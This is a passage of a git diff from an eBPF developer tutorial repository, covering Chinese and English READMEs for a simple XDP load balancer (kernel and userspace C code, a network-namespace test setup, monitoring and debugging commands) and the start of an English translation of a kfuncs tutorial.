(inet_pton(AF_INET, argv[4], &backend[1].ip) != 1) { + fprintf(stderr, "Invalid backend 2 IP address\n"); + return 1; + } + if (parse_mac(argv[5], backend[1].mac) < 0) { + return 1; + } + + // Load and attach the BPF program + struct xdp_lb_bpf *skel = xdp_lb_bpf__open_and_load(); + if (!skel) { + fprintf(stderr, "Failed to open and load BPF skeleton\n"); + return 1; + } + + int ifindex = if_nametoindex(ifname); + if (ifindex < 0) { + perror("if_nametoindex"); + xdp_lb_bpf__destroy(skel); + return 1; + } + + if (bpf_program__attach_xdp(skel->progs.xdp_load_balancer, ifindex) < 0) { + fprintf(stderr, "Failed to attach XDP program\n"); + xdp_lb_bpf__destroy(skel); + return 1; + } + + // Update backend configurations + for (int i = 0; i < 2; i++) { + if (bpf_map_update_elem(bpf_map__fd(skel->maps.backends), &i, &backend[i], 0) < 0) { + perror("bpf_map_update_elem"); + xdp_lb_bpf__destroy(skel); + return 1; + } + } + + printf("XDP load balancer configured with backends:\n"); + printf("Backend 1 - IP: %s, MAC: %s\n", argv[2], argv[3]); + printf("Backend 2 - IP: %s, MAC: %s\n", argv[4], argv[5]); + + printf("Press Ctrl+C to exit...\n"); + while (1) { + sleep(1); // Keep the program running + } + + // Cleanup and detach + bpf_xdp_detach(ifindex, 0, NULL); + xdp_lb_bpf__detach(skel); + xdp_lb_bpf__destroy(skel); + return 0; +} +``` + +### 用户空间代码概述 + +提供的用户空间代码负责设置和配置在内核中运行的 XDP 负载均衡器程序。它接受命令行参数,加载 eBPF 程序,将其附加到网络接口,并更新后端服务器的配置信息。 + +### 1. **解析命令行参数和设置后端服务器** + +程序期望五个命令行参数:网络接口的名称 (`ifname`)、两个后端服务器的 IP 地址和 MAC 地址。它通过 `inet_pton()` 函数解析 IP 地址,并使用 `parse_mac()` 函数解析 MAC 地址,确保提供的 MAC 地址格式正确。解析后的后端信息存储在 `backend_config` 结构体中。 + +### 2. **加载并附加 BPF 程序** + +BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加载到内核中。程序通过 `if_nametoindex()` 将网络接口名称转换为索引,然后使用 `bpf_program__attach_xdp()` 将加载的 BPF 程序附加到此接口上。 + +### 3. **配置后端服务器信息** + +后端的 IP 和 MAC 地址被写入 `backends` BPF map 中,使用 `bpf_map_update_elem()` 函数。此步骤确保 BPF 程序能够访问后端配置,从而基于内核代码中的逻辑将数据包路由到正确的后端服务器。 + +### 4. 
**程序循环与清理** + +程序进入无限循环(`while (1) { sleep(1); }`),使 XDP 程序保持运行。当用户通过按下 Ctrl+C 退出时,BPF 程序从网络接口上卸载,并通过调用 `xdp_lb_bpf__destroy()` 清理资源。 + +总的来说,这段用户空间代码负责配置和管理 XDP 负载均衡器的生命周期,使得可以动态更新后端配置,并确保负载均衡器正确附加到网络接口上。 + +### 测试环境拓扑 + +拓扑结构表示一个测试环境,其中本地机器通过负载均衡器与两个后端节点(h2 和 h3)通信。通过虚拟以太网对(veth0 到 veth6),本地机器与负载均衡器相连,在受控环境中模拟网络连接。每个虚拟接口都有自己的 IP 和 MAC 地址,代表不同的实体。 + +```txt + +---------------------------+ + | 本地机器 | + | IP: 10.0.0.1 (veth0) | + | MAC: DE:AD:BE:EF:00:01 | + +------------+---------------+ + | + | (veth1) + | + +--------+---------------+ + | 负载均衡器 | + | IP: 10.0.0.10 (veth6) | + | MAC: DE:AD:BE:EF:00:10| + +--------+---------------+ + | + +---------+----------------------------+ + | | +(veth2) (veth4) + | | ++--+---------------+ +--------+---------+ +| h2 | | h3 | +| IP: | | IP: | +|10.0.0.2 (veth3) | |10.0.0.3 (veth5) | +| MAC: | | MAC: | +|DE:AD:BE:EF:00:02 | |DE:AD:BE:EF:00:03 | ++------------------+ +------------------+ +``` + +这个设置可以通过脚本(`setup.sh`)轻松初始化,并通过另一个脚本(`teardown.sh`)删除。 + +> 如果您对本教程感兴趣,请帮助我们创建一个容器化的版本,简化设置和拓扑结构!目前的设置和删除过程基于网络命名空间,容器化的版本会更加友好。 + +初始化: + +```sh +sudo ./setup.sh +``` + +删除: + +```sh +sudo ./teardown.sh +``` + +### 运行负载均衡器 + +要运行 XDP 负载均衡器,执行以下命令,指定接口和后端服务器的 IP 和 MAC 地址: + +```console +sudo ip netns exec lb ./xdp_lb veth6 10.0.0.2 de:ad:be:ef:00:02 10.0.0.3 de:ad:be:ef:00:03 +``` + +这将配置负载均衡器并输出后端服务器的详细信息: + +```console +XDP load balancer configured with backends: +Backend 1 - IP: 10.0.0.2, MAC: de:ad:be:ef:00:02 +Backend 2 - IP: 10.0.0.3, MAC: de:ad:be:ef:00:03 +Press Ctrl+C to exit... +``` + +### 测试设置 + +您可以通过在两个后端命名空间(`h2` 和 `h3`)启动 HTTP 服务器,并从本地机器向负载均衡器发送请求来测试设置: + +在 `h2` 和 `h3` 上启动服务器: + +```sh +sudo ip netns exec h2 python3 -m http.server +sudo ip netns exec h3 python3 -m http.server +``` + +然后,向负载均衡器 IP 发送请求: + +```sh +curl 10.0.0.10:8000 +``` + +负载均衡器将根据哈希函数将流量分配到后端服务器(`h2` 和 `h3`)。 + +### 使用 `bpf_printk` 进行监控 + +您可以通过查看 `bpf_printk` 日志来监控负载均衡器的活动。BPF 程序在处理每个数据包时会打印诊断消息。您可以使用以下命令查看这些日志: + +```console +sudo cat /sys/kernel/debug/tracing/trace_pipe +``` + +日志示例: + +```console +-0 [004] ..s2. 24174.812722: bpf_trace_printk: xdp_load_balancer received packet +-0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Source IP: 0xa000001 +-0 [004] .Ns2. 24174.812729: Received Destination IP: 0xa00000a +-0 [004] .Ns2. 24174.812731: Received Source MAC: de:ad:be:ef:0:1 +-0 [004] .Ns2. 24174.812732: Received Destination MAC: de:ad:be:ef:0:10 +-0 [004] .Ns2. 24174.812732: Packet from client +-0 [004] .Ns2. 24174.812734: bpf_trace_printk: Redirecting packet to new IP 0xa000002 from IP 0xa00000a +-0 [004] .Ns2. 24174.812735: New Dest MAC: de:ad:be:ef:0:2 +-0 [004] .Ns2. 
24174.812735: New Source MAC: de:ad:be:ef:0:10 +``` + +### 调试问题 + +某些系统可能会因为类似于此[博客文章](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/)中描述的问题而导致数据包丢失或转发失败。您可以使用 `bpftrace` 跟踪 XDP 错误进行调试: + +```sh +sudo bpftrace -e 'tracepoint:xdp:xdp_bulk_tx{@redir_errno[-args->err] = count();}' +``` + +如果输出如下所示: + +```sh +@redir_errno[6]: 3 +``` + +这表明与 XDP 数据包转发相关的错误。错误代码 `6` 通常指向可以进一步调查的特定转发问题。 + +### 结论 + +本教程展示了如何使用 eBPF 设置一个简单的 XDP 负载均衡器,以实现高效的流量分发。对于那些想了解更多关于 eBPF 知识的用户,包括更高级的示例和教程,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 + +### 参考文献 + +- [XDP 编程实践教程](https://github.com/xdp-project/xdp-tutorial) \ No newline at end of file diff --git a/src/42-xdp-loadbalancer/README_en.md b/src/42-xdp-loadbalancer/README_en.md deleted file mode 100644 index c792e8f..0000000 --- a/src/42-xdp-loadbalancer/README_en.md +++ /dev/null @@ -1,528 +0,0 @@ - -# eBPF Developer Tutorial: XDP Load Balancer - -In this tutorial, we will guide you through the process of implementing a simple XDP (eXpress Data Path) load balancer using eBPF (Extended Berkeley Packet Filter). With just C, libbpf, and no external dependencies, this hands-on guide is perfect for developers interested in harnessing the full power of the Linux kernel to build highly efficient network applications. - -## Why XDP? - -`XDP` (eXpress Data Path) is a fast, in-kernel networking framework in Linux that allows packet processing at the earliest point in the network stack, right in the network interface card (NIC). This enables ultra-low-latency and high-throughput packet handling, making XDP ideal for tasks like load balancing, DDoS protection, and traffic filtering. - -Key Features of XDP - -1. **Fast Packet Processing**: XDP handles packets directly at the NIC level, reducing latency and improving performance by avoiding the usual networking stack overhead. -2. **Efficient**: Because it processes packets before they reach the kernel, XDP minimizes CPU usage and handles high traffic loads without slowing down the system. -3. **Customizable with eBPF**: XDP programs are written using eBPF, allowing you to create custom packet-handling logic for specific use cases like dropping, redirecting, or forwarding packets. -4. **Low CPU Overhead**: With support for zero-copy packet forwarding, XDP uses fewer system resources, making it perfect for handling high traffic with minimal CPU load. -5. **Simple Actions**: XDP programs return predefined actions like dropping, passing, or redirecting packets, providing control over how traffic is handled. - -Projects That Use XDP - -- `Cilium` is an open-source networking tool for cloud-native environments like Kubernetes. It uses XDP to efficiently handle packet filtering and load balancing, improving performance in high-traffic networks. -- `Katran`, developed by Facebook, is a load balancer that uses XDP to handle millions of connections with low CPU usage. It distributes traffic efficiently across servers and is used internally at Facebook for large-scale networking. -- `Cloudflare` uses XDP to protect against DDoS attacks. By filtering out malicious traffic at the NIC level, Cloudflare can drop attack packets before they even reach the kernel, minimizing the impact on their network. - -### Why Choose XDP Over Other Methods? 
- -Compared to traditional tools like `iptables` or `tc`, XDP offers: - -- **Speed**: It operates directly in the NIC driver, processing packets much faster than traditional methods. -- **Flexibility**: With eBPF, you can write custom packet-handling logic to meet specific needs. -- **Efficiency**: XDP uses fewer resources, making it suitable for environments that need to handle high traffic without overloading the system. - -## The Project: Building a Simple Load Balancer - -In this project, we will be focusing on building a load balancer using XDP. A load balancer efficiently distributes incoming network traffic across multiple backend servers to prevent any single server from becoming overwhelmed. With the combination of XDP and eBPF, we can build a load balancer that operates at the edge of the Linux networking stack, ensuring high performance even under heavy traffic conditions. - -The load balancer we’ll be implementing will: - -- Listen for incoming network packets. -- Calculate a hash based on the packet's source IP and port, allowing us to distribute the traffic across multiple backend servers. -- Forward the packet to the appropriate backend server based on the calculated hash. - -We'll keep the design simple but powerful, showing you how to leverage eBPF’s capabilities to create a lightweight load balancing solution. - -## kernel eBPF code - -```c -// xdp_lb.bpf.c -#include -#include -#include -#include -#include -#include -#include -#include "xx_hash.h" - -struct backend_config { - __u32 ip; - unsigned char mac[ETH_ALEN]; -}; - -// Backend IP and MAC address map -struct { - __uint(type, BPF_MAP_TYPE_ARRAY); - __uint(max_entries, 2); // Two backends - __type(key, __u32); - __type(value, struct backend_config); -} backends SEC(".maps"); - -int client_ip = bpf_htonl(0xa000001); -unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; -int load_balancer_ip = bpf_htonl(0xa00000a); -unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; - -static __always_inline __u16 -csum_fold_helper(__u64 csum) -{ - int i; - for (i = 0; i < 4; i++) - { - if (csum >> 16) - csum = (csum & 0xffff) + (csum >> 16); - } - return ~csum; -} - -static __always_inline __u16 -iph_csum(struct iphdr *iph) -{ - iph->check = 0; - unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); - return csum_fold_helper(csum); -} - -SEC("xdp") -int xdp_load_balancer(struct xdp_md *ctx) { - void *data_end = (void *)(long)ctx->data_end; - void *data = (void *)(long)ctx->data; - - bpf_printk("xdp_load_balancer received packet"); - - // Ethernet header - struct ethhdr *eth = data; - if ((void *)(eth + 1) > data_end) - return XDP_PASS; - - // Check if the packet is IP (IPv4) - if (eth->h_proto != __constant_htons(ETH_P_IP)) - return XDP_PASS; - - // IP header - struct iphdr *iph = (struct iphdr *)(eth + 1); - if ((void *)(iph + 1) > data_end) - return XDP_PASS; - - // Check if the protocol is TCP or UDP - if (iph->protocol != IPPROTO_TCP) - return XDP_PASS; - - bpf_printk("Received Source IP: 0x%x", bpf_ntohl(iph->saddr)); - bpf_printk("Received Destination IP: 0x%x", bpf_ntohl(iph->daddr)); - bpf_printk("Received Source MAC: %x:%x:%x:%x:%x:%x", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); - bpf_printk("Received Destination MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); - - if (iph->saddr == client_ip) - { - 
bpf_printk("Packet from client"); - - __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; - - struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); - if (!backend) - return XDP_PASS; - - iph->daddr = backend->ip; - __builtin_memcpy(eth->h_dest, backend->mac, ETH_ALEN); - } - else - { - bpf_printk("Packet from backend"); - iph->daddr = client_ip; - __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); - } - - // Update IP source address to the load balancer's IP - iph->saddr = load_balancer_ip; - // Update Ethernet source MAC address to the current lb's MAC - __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); - - // Recalculate IP checksum - iph->check = iph_csum(iph); - - bpf_printk("Redirecting packet to new IP 0x%x from IP 0x%x", - bpf_ntohl(iph->daddr), - bpf_ntohl(iph->saddr) - ); - bpf_printk("New Dest MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); - bpf_printk("New Source MAC: %x:%x:%x:%x:%x:%x\n", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); - // Return XDP_TX to transmit the modified packet back to the network - return XDP_TX; -} - -char _license[] SEC("license") = "GPL"; -``` - -Here’s a breakdown of the key sections of the kernel code for your blog: - -### 1. **Header Files and Data Structures** - -The code begins with necessary header files like ``, ``, ``, and more. These headers provide definitions for handling Ethernet frames, IP packets, and BPF helper functions. - -The `backend_config` struct is defined to hold the IP and MAC address of backend servers. This will later be used for routing packets based on load balancing logic. - -```c -struct backend_config { - __u32 ip; - unsigned char mac[ETH_ALEN]; -}; -``` - -### 2. **Backend and Load Balancer Configuration** - -The code defines an eBPF map named `backends` that stores IP and MAC addresses for two backends. The `BPF_MAP_TYPE_ARRAY` type is used to store backend configuration, with `max_entries` set to 2, indicating the load balancer will route to two backend servers. - -```c -struct { - __uint(type, BPF_MAP_TYPE_ARRAY); - __uint(max_entries, 2); - __type(key, __u32); - __type(value, struct backend_config); -} backends SEC(".maps"); -``` - -There are also predefined IP addresses and MAC addresses for the client and load balancer: - -```c -int client_ip = bpf_htonl(0xa000001); -unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; -int load_balancer_ip = bpf_htonl(0xa00000a); -unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; -``` - -### 3. **Checksum Functions** - -The function `iph_csum()` recalculates the IP header checksum after modifying the packet's contents. It's essential to keep the integrity of IP packets when any modification is done to the headers. - -```c -static __always_inline __u16 iph_csum(struct iphdr *iph) { - iph->check = 0; - unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); - return csum_fold_helper(csum); -} -``` - -### 4. **XDP Program Logic** - -The core of the XDP load balancer logic is implemented in the `xdp_load_balancer` function, which is attached to the XDP hook. It processes incoming packets and directs them either to a backend or back to the client. 
- -- **Initial Checks**: - The function begins by verifying that the packet is an Ethernet frame, then checks if it's an IP packet (IPv4) and if it's using the TCP protocol. - - ```c - if (eth->h_proto != __constant_htons(ETH_P_IP)) - return XDP_PASS; - if (iph->protocol != IPPROTO_TCP) - return XDP_PASS; - ``` - -- **Client Packet Handling**: - If the source IP matches the client IP, the code hashes the IP header using `xxhash32` to determine the appropriate backend (based on the key modulo 2). - - ```c - if (iph->saddr == client_ip) { - __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; - struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); - ``` - - The destination IP and MAC are replaced with those of the selected backend, and the packet is forwarded to the backend. - -- **Backend Packet Handling**: - If the packet is from a backend server, the destination is set to the client’s IP and MAC address, ensuring that the backend’s response is directed back to the client. - - ```c - iph->daddr = client_ip; - __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); - ``` - -- **Rewriting IP and MAC Addresses**: - The source IP and MAC are updated to the load balancer’s values for all outgoing packets, ensuring that the load balancer appears as the source for both client-to-backend and backend-to-client communication. - - ```c - iph->saddr = load_balancer_ip; - __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); - ``` - -- **Recalculate Checksum**: - After modifying the IP header, the checksum is recalculated using the previously defined `iph_csum()` function. - - ```c - iph->check = iph_csum(iph); - ``` - -- **Final Action**: - The packet is transmitted using the `XDP_TX` action, which instructs the NIC to send the modified packet. - - ```c - return XDP_TX; - ``` - -### 5. **Conclusion** - -This part of the blog could explain how the load balancer ensures traffic is efficiently routed between the client and two backend servers by inspecting the source IP, hashing it for load distribution, and modifying the destination IP and MAC before forwarding the packet. The `XDP_TX` action is key to the high-speed packet handling provided by eBPF in the XDP layer. - -This explanation can help readers understand the flow of the packet and the role of each section of the code in managing load balancing across multiple backends. 
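-
-For readers who want to check the checksum logic outside the kernel, here is a standalone user-space sketch — not part of the tutorial sources — of the same ones'-complement algorithm (RFC 1071) that `iph_csum()` and `csum_fold_helper()` implement:
-
-```c
-#include <stdint.h>
-#include <stdio.h>
-
-/* Sum the header as 16-bit words, fold the carries, invert. */
-static uint16_t ip_checksum(const void *hdr, int len)
-{
-    const uint16_t *p = hdr;
-    uint32_t sum = 0;
-    for (; len > 1; len -= 2)
-        sum += *p++;
-    if (len)                      /* odd trailing byte */
-        sum += *(const uint8_t *)p;
-    while (sum >> 16)             /* same folding loop as csum_fold_helper() */
-        sum = (sum & 0xffff) + (sum >> 16);
-    return (uint16_t)~sum;
-}
-
-int main(void)
-{
-    /* 20-byte IPv4 header (10.0.0.10 -> 10.0.0.2) with checksum bytes zeroed. */
-    uint8_t iph[20] = { 0x45, 0x00, 0x00, 0x28, 0x00, 0x00, 0x40, 0x00,
-                        0x40, 0x06, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x0a,
-                        0x0a, 0x00, 0x00, 0x02 };
-    printf("checksum: 0x%04x\n", ip_checksum(iph, sizeof(iph)));
-    return 0;
-}
-```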
-
-## Userspace code
-
-```c
-// xdp_lb.c
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <arpa/inet.h>
-#include <net/if.h>
-#include <bpf/bpf.h>
-#include <bpf/libbpf.h>
-#include "xdp_lb.skel.h" // The generated skeleton
-
-struct backend_config {
-    __u32 ip;
-    unsigned char mac[6];
-};
-
-static int parse_mac(const char *str, unsigned char *mac) {
-    if (sscanf(str, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
-               &mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]) != 6) {
-        fprintf(stderr, "Invalid MAC address format\n");
-        return -1;
-    }
-    return 0;
-}
-
-int main(int argc, char **argv) {
-    if (argc != 6) {
-        fprintf(stderr, "Usage: %s <ifname> <backend1_ip> <backend1_mac> <backend2_ip> <backend2_mac>\n", argv[0]);
-        return 1;
-    }
-
-    const char *ifname = argv[1];
-    struct backend_config backend[2];
-
-    // Parse backend 1
-    if (inet_pton(AF_INET, argv[2], &backend[0].ip) != 1) {
-        fprintf(stderr, "Invalid backend 1 IP address\n");
-        return 1;
-    }
-    if (parse_mac(argv[3], backend[0].mac) < 0) {
-        return 1;
-    }
-
-    // Parse backend 2
-    if (inet_pton(AF_INET, argv[4], &backend[1].ip) != 1) {
-        fprintf(stderr, "Invalid backend 2 IP address\n");
-        return 1;
-    }
-    if (parse_mac(argv[5], backend[1].mac) < 0) {
-        return 1;
-    }
-
-    // Load and attach the BPF program
-    struct xdp_lb_bpf *skel = xdp_lb_bpf__open_and_load();
-    if (!skel) {
-        fprintf(stderr, "Failed to open and load BPF skeleton\n");
-        return 1;
-    }
-
-    // if_nametoindex() returns 0 (not a negative value) on failure
-    unsigned int ifindex = if_nametoindex(ifname);
-    if (ifindex == 0) {
-        perror("if_nametoindex");
-        xdp_lb_bpf__destroy(skel);
-        return 1;
-    }
-
-    // bpf_program__attach_xdp() returns a link pointer, NULL on failure
-    struct bpf_link *link = bpf_program__attach_xdp(skel->progs.xdp_load_balancer, ifindex);
-    if (!link) {
-        fprintf(stderr, "Failed to attach XDP program\n");
-        xdp_lb_bpf__destroy(skel);
-        return 1;
-    }
-
-    // Update backend configurations
-    for (int i = 0; i < 2; i++) {
-        if (bpf_map_update_elem(bpf_map__fd(skel->maps.backends), &i, &backend[i], 0) < 0) {
-            perror("bpf_map_update_elem");
-            xdp_lb_bpf__destroy(skel);
-            return 1;
-        }
-    }
-
-    printf("XDP load balancer configured with backends:\n");
-    printf("Backend 1 - IP: %s, MAC: %s\n", argv[2], argv[3]);
-    printf("Backend 2 - IP: %s, MAC: %s\n", argv[4], argv[5]);
-
-    printf("Press Ctrl+C to exit...\n");
-    while (1) {
-        sleep(1); // Keep the program running
-    }
-
-    // Cleanup and detach (unreachable with the loop above; when the
-    // process is killed, the kernel tears down the XDP link for us)
-    bpf_link__destroy(link);
-    xdp_lb_bpf__destroy(skel);
-    return 0;
-}
-```
-
-The userspace code is responsible for setting up and configuring the XDP load balancer program that runs in the kernel. It accepts command-line arguments, loads the eBPF program, attaches it to a network interface, and updates the backend configurations.
-
-### 1. **Argument Parsing and Backend Setup**
-
-The program expects five command-line arguments: the name of the network interface (`ifname`), followed by the IP address and MAC address of each of the two backend servers. It parses the IP addresses using `inet_pton()` and the MAC addresses using the `parse_mac()` function, which ensures that the provided MAC addresses are correctly formatted. The parsed backend information is stored in a `backend_config` structure.
-
-### 2. **Loading and Attaching the BPF Program**
-
-The BPF skeleton (generated via `xdp_lb.skel.h`) is used to open and load the XDP program into the kernel. The program then identifies the network interface by converting the interface name into an index using `if_nametoindex()`. Afterward, it attaches the loaded BPF program to this interface using `bpf_program__attach_xdp()`.
-
-### 3. **Configuring Backend Information**
-
-The backend IP and MAC addresses are written to the `backends` BPF map using `bpf_map_update_elem()`.
This step ensures that the BPF program has access to the backend configurations, allowing it to route packets to the correct backend servers based on the logic in the kernel code.
-
-### 4. **Program Loop and Cleanup**
-
-The program then enters an infinite loop (`while (1) { sleep(1); }`) so that the XDP program stays attached and keeps processing packets. Because the loop never returns, the cleanup calls after it are never reached in practice; when you press Ctrl+C the process is killed, and the kernel releases the BPF link, which detaches the XDP program from the interface.
-
-In summary, this userspace code is responsible for configuring and managing the lifecycle of the XDP load balancer, making it easy to update backend configurations dynamically and ensuring the load balancer is correctly attached to a network interface.
-
-## The topology of test environment
-
-The topology represents a test environment where a local machine communicates with two backend nodes (h2 and h3) through a load balancer. The local machine is connected to the load balancer via virtual Ethernet pairs (veth0 to veth6), simulating network connections in a controlled environment. Each virtual interface has its own IP and MAC address to represent a different entity.
-
-```txt
-      +---------------------------+
-      |       Local Machine       |
-      |   IP: 10.0.0.1 (veth0)    |
-      |  MAC: DE:AD:BE:EF:00:01   |
-      +-------------+-------------+
-                    |
-                    | (veth1)
-                    |
-      +-------------+-------------+
-      |       Load Balancer       |
-      |   IP: 10.0.0.10 (veth6)   |
-      |  MAC: DE:AD:BE:EF:00:10   |
-      +-------------+-------------+
-                    |
-         +----------+-----------------------+
-         |                                  |
-      (veth2)                            (veth4)
-         |                                  |
-+--------+---------+              +---------+--------+
-|        h2        |              |        h3        |
-| IP:              |              | IP:              |
-| 10.0.0.2 (veth3) |              | 10.0.0.3 (veth5) |
-| MAC:             |              | MAC:             |
-| DE:AD:BE:EF:00:02|              | DE:AD:BE:EF:00:03|
-+------------------+              +------------------+
-```
-
-The setup can be initialized with a script (setup.sh) and removed with a teardown script (teardown.sh).
-
-> If you are interested in this tutorial, please help us create a containerized version of the setup and topology! The current setup and teardown scripts are based on network namespaces; a containerized version would be friendlier to use.
-
-Setup:
-
-```sh
-sudo ./setup.sh
-```
-
-Teardown:
-
-```sh
-sudo ./teardown.sh
-```
-
-### Running the Load Balancer
-
-To run the XDP load balancer, execute the following command, specifying the interface and the backends' IP and MAC addresses:
-
-```console
-sudo ip netns exec lb ./xdp_lb veth6 10.0.0.2 de:ad:be:ef:00:02 10.0.0.3 de:ad:be:ef:00:03
-```
-
-This will configure the load balancer and print the details of the backends:
-
-```console
-XDP load balancer configured with backends:
-Backend 1 - IP: 10.0.0.2, MAC: de:ad:be:ef:00:02
-Backend 2 - IP: 10.0.0.3, MAC: de:ad:be:ef:00:03
-Press Ctrl+C to exit...
-```
-
-### Testing the Setup
-
-You can test the setup by starting HTTP servers on the two backend namespaces (`h2` and `h3`) and sending requests from the local machine to the load balancer.
-
-Start servers on `h2` and `h3`:
-
-```sh
-sudo ip netns exec h2 python3 -m http.server
-sudo ip netns exec h3 python3 -m http.server
-```
-
-Then, send a request to the load balancer IP (Python's `http.server` listens on port 8000 by default):
-
-```sh
-curl 10.0.0.10:8000
-```
-
-The load balancer will distribute traffic to the backends (`h2` and `h3`) based on the hashing function.
-
-### Monitoring with `bpf_printk`
-
-You can monitor the load balancer's activity by checking the `bpf_printk` logs. The BPF program prints diagnostic messages whenever a packet is processed.
You can view these logs using:
-
-```console
-sudo cat /sys/kernel/debug/tracing/trace_pipe
-```
-
-Example output:
-
-```console
-<idle>-0    [004] ..s2. 24174.812722: bpf_trace_printk: xdp_load_balancer received packet
-<idle>-0    [004] .Ns2. 24174.812729: bpf_trace_printk: Received Source IP: 0xa000001
-<idle>-0    [004] .Ns2. 24174.812729: bpf_trace_printk: Received Destination IP: 0xa00000a
-<idle>-0    [004] .Ns2. 24174.812731: bpf_trace_printk: Received Source MAC: de:ad:be:ef:0:1
-<idle>-0    [004] .Ns2. 24174.812732: bpf_trace_printk: Received Destination MAC: de:ad:be:ef:0:10
-<idle>-0    [004] .Ns2. 24174.812732: bpf_trace_printk: Packet from client
-<idle>-0    [004] .Ns2. 24174.812734: bpf_trace_printk: Redirecting packet to new IP 0xa000002 from IP 0xa00000a
-<idle>-0    [004] .Ns2. 24174.812735: bpf_trace_printk: New Dest MAC: de:ad:be:ef:0:2
-<idle>-0    [004] .Ns2. 24174.812735: bpf_trace_printk: New Source MAC: de:ad:be:ef:0:10
-```
-
-### Debugging Issues
-
-Some systems may experience packet loss or failure to forward packets due to issues similar to those described in this [blog post](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/). You can debug these issues using `bpftrace` to trace XDP errors:
-
-```sh
-sudo bpftrace -e 'tracepoint:xdp:xdp_bulk_tx{@redir_errno[-args->err] = count();}'
-```
-
-If you see an output like this:
-
-```sh
-@redir_errno[6]: 3
-```
-
-it indicates that XDP packet forwarding is failing. The error code `6` corresponds to `ENXIO` ("no such device or address"); with veth pairs this commonly means the transmitting side cannot hand the packet to the peer, for example because the peer interface has no XDP program attached, as the blog post above describes.
-
-### Conclusion
-
-This tutorial demonstrates how to set up a simple XDP load balancer using eBPF, providing efficient traffic distribution across backend servers. For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our tutorial repository at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/).
-
-### References
-
-Here is a short list of XDP references:
-
-1. [XDP Programming Hands-On Tutorial](https://github.com/xdp-project/xdp-tutorial)
-2. [XDP Tutorial in bpf-developer-tutorial](https://eunomia.dev/tutorials/21-xdp/)
diff --git a/src/43-kfuncs/README.md b/src/43-kfuncs/README.md
index f80f394..a3ba587 100644
--- a/src/43-kfuncs/README.md
+++ b/src/43-kfuncs/README.md
@@ -1,184 +1,184 @@
-# 超越 eBPF 的极限:在内核模块中定义自定义 kfunc
+# Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules
 
-你是否曾经觉得 eBPF 的能力有限?也许你遇到了现有 eBPF 功能无法实现目标的情况。或许你需要与内核进行更深层次的交互,或者标准 eBPF 运行时无法解决的性能问题。如果你曾经希望在 eBPF 程序中拥有更多的灵活性和强大功能,那么本教程正适合你。
+Have you ever felt constrained by eBPF's capabilities? Maybe you've run into situations where the existing eBPF features just aren't enough to accomplish your goals. Perhaps you need deeper interactions with the kernel, or you're facing performance issues that the standard eBPF runtime can't solve. If you've ever wished for more flexibility and power in your eBPF programs, this tutorial is for you.
 
-## 引言:添加 `strstr` kfunc 以突破 eBPF 运行时的限制
+## Introduction: Adding a `strstr` kfunc to Break Free from eBPF Runtime Limitations
 
-**eBPF(扩展伯克利包过滤器)** 通过允许开发者在内核中运行受沙箱限制的程序,彻底改变了 Linux 系统编程。它在网络、安全和可观测性方面具有革命性的作用,能够实现强大的功能,而无需修改内核源代码或加载传统的内核模块。
+**eBPF (extended Berkeley Packet Filter)** has revolutionized Linux system programming by allowing developers to run sandboxed programs inside the kernel.
